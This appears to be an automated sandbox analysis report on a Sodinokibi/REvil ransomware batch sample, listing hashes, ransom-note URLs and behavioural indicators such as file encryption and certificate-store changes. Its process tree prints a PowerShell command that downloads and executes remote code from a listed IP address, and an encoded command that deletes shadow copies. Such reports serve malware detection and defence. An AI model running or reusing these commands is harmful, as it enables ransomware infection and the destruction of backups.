Analysis
-
max time kernel
137s -
max time network
151s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
08-08-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
d0333bd53e654eef1380155f828b71d5.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
d0333bd53e654eef1380155f828b71d5.bat
Resource
win10
General
-
Target
d0333bd53e654eef1380155f828b71d5.bat
-
Size
219B
-
MD5
72cc00975d3f7dc5564c1a0fdbd1897b
-
SHA1
7eac1c6c294cf6a12495a484965884263cd77ff2
-
SHA256
c489438648791383b0506b31ec255a3f68b209bd6e897c5ab4cb789ffc519673
-
SHA512
9a76771f5f5e726113dca7e35c9ee71c4a2220e673c09b8fe48dd09385e1a2353d91a7002b198dbf136c03a435fa068657f6338a39f0095b148c8056cacf69e9
Malware Config
Extracted
http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5
Extracted
C:\80242-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F95CCF8219484085
http://decryptor.cc/F95CCF8219484085
Signatures
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 25 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\TestShow.rtf powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\80242-readme.txt powershell.exe File created \??\c:\program files (x86)\80242-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertToSet.M2V powershell.exe File opened for modification \??\c:\program files\GroupPublish.M2V powershell.exe File opened for modification \??\c:\program files\MountRestart.mpv2 powershell.exe File opened for modification \??\c:\program files\RequestSearch.mpg powershell.exe File opened for modification \??\c:\program files\StepEnter.php powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\80242-readme.txt powershell.exe File opened for modification \??\c:\program files\DisconnectExit.ppt powershell.exe File opened for modification \??\c:\program files\ExportImport.wma powershell.exe File opened for modification \??\c:\program files\ExportTest.mpg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\80242-readme.txt powershell.exe File opened for modification \??\c:\program files\StopSwitch.i64 powershell.exe File opened for modification \??\c:\program files\ConnectConvertFrom.wmf powershell.exe File opened for modification \??\c:\program files\EnterUse.3gp powershell.exe File opened for modification \??\c:\program files\PingEdit.ppsx powershell.exe File opened for modification \??\c:\program files\SetJoin.avi powershell.exe File opened for modification \??\c:\program files\TraceComplete.css powershell.exe File opened for modification \??\c:\program files\UnlockSet.mpp powershell.exe File opened for modification \??\c:\program files\UnpublishSubmit.ogg powershell.exe File opened for modification \??\c:\program files\UseSelect.ttf powershell.exe File created \??\c:\program files\80242-readme.txt powershell.exe File opened for modification \??\c:\program files\EnterInitialize.mpeg2 powershell.exe File opened for modification \??\c:\program files\WatchUnblock.inf powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pay7so6y.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1460 powershell.exe -
Blacklisted process makes network request 114 IoCs
Processes:
powershell.exeflow pid process 3 1460 powershell.exe 7 1460 powershell.exe 9 1460 powershell.exe 10 1460 powershell.exe 12 1460 powershell.exe 14 1460 powershell.exe 16 1460 powershell.exe 17 1460 powershell.exe 19 1460 powershell.exe 20 1460 powershell.exe 22 1460 powershell.exe 23 1460 powershell.exe 25 1460 powershell.exe 27 1460 powershell.exe 29 1460 powershell.exe 31 1460 powershell.exe 33 1460 powershell.exe 34 1460 powershell.exe 36 1460 powershell.exe 37 1460 powershell.exe 40 1460 powershell.exe 41 1460 powershell.exe 43 1460 powershell.exe 44 1460 powershell.exe 46 1460 powershell.exe 47 1460 powershell.exe 49 1460 powershell.exe 50 1460 powershell.exe 52 1460 powershell.exe 54 1460 powershell.exe 55 1460 powershell.exe 57 1460 powershell.exe 59 1460 powershell.exe 60 1460 powershell.exe 63 1460 powershell.exe 65 1460 powershell.exe 66 1460 powershell.exe 68 1460 powershell.exe 69 1460 powershell.exe 71 1460 powershell.exe 73 1460 powershell.exe 75 1460 powershell.exe 76 1460 powershell.exe 78 1460 powershell.exe 80 1460 powershell.exe 82 1460 powershell.exe 85 1460 powershell.exe 86 1460 powershell.exe 88 1460 powershell.exe 90 1460 powershell.exe 92 1460 powershell.exe 94 1460 powershell.exe 95 1460 powershell.exe 97 1460 powershell.exe 99 1460 powershell.exe 101 1460 powershell.exe 102 1460 powershell.exe 104 1460 powershell.exe 105 1460 powershell.exe 107 1460 powershell.exe 108 1460 powershell.exe 110 1460 powershell.exe 112 1460 powershell.exe 113 1460 powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\EditRepair.png => \??\c:\users\admin\pictures\EditRepair.png.80242 powershell.exe File renamed C:\Users\Admin\Pictures\LimitInvoke.tif => \??\c:\users\admin\pictures\LimitInvoke.tif.80242 powershell.exe File renamed C:\Users\Admin\Pictures\WatchEnter.raw => \??\c:\users\admin\pictures\WatchEnter.raw.80242 powershell.exe File opened for modification \??\c:\users\admin\pictures\DisableExpand.tiff powershell.exe File opened for modification \??\c:\users\admin\pictures\StopGroup.tiff powershell.exe File renamed C:\Users\Admin\Pictures\EnterStop.raw => \??\c:\users\admin\pictures\EnterStop.raw.80242 powershell.exe File renamed C:\Users\Admin\Pictures\PublishUnblock.crw => \??\c:\users\admin\pictures\PublishUnblock.crw.80242 powershell.exe File renamed C:\Users\Admin\Pictures\HidePing.tiff => \??\c:\users\admin\pictures\HidePing.tiff.80242 powershell.exe File renamed C:\Users\Admin\Pictures\ResetRepair.raw => \??\c:\users\admin\pictures\ResetRepair.raw.80242 powershell.exe File renamed C:\Users\Admin\Pictures\StopGroup.tiff => \??\c:\users\admin\pictures\StopGroup.tiff.80242 powershell.exe File opened for modification \??\c:\users\admin\pictures\HidePing.tiff powershell.exe File renamed C:\Users\Admin\Pictures\DisableExpand.tiff => \??\c:\users\admin\pictures\DisableExpand.tiff.80242 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1296 wrote to memory of 1460 1296 cmd.exe powershell.exe PID 1296 wrote to memory of 1460 1296 cmd.exe powershell.exe PID 1296 wrote to memory of 1460 1296 cmd.exe powershell.exe PID 1296 wrote to memory of 1460 1296 cmd.exe powershell.exe PID 1460 wrote to memory of 1784 1460 powershell.exe powershell.exe PID 1460 wrote to memory of 1784 1460 powershell.exe powershell.exe PID 1460 wrote to memory of 1784 1460 powershell.exe powershell.exe PID 1460 wrote to memory of 1784 1460 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 1784 powershell.exe Token: SeBackupPrivilege 1608 vssvc.exe Token: SeRestorePrivilege 1608 vssvc.exe Token: SeAuditPrivilege 1608 vssvc.exe Token: SeTakeOwnershipPrivilege 1460 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1784 powershell.exe 1784 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\d0333bd53e654eef1380155f828b71d5.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5');Invoke-RCYSVVOUOPIT;Start-Sleep -s 10000"2⤵
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Blacklisted process makes network request
- Modifies system certificate store
- Modifies extensions of user files
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
PID:1460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1784
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1608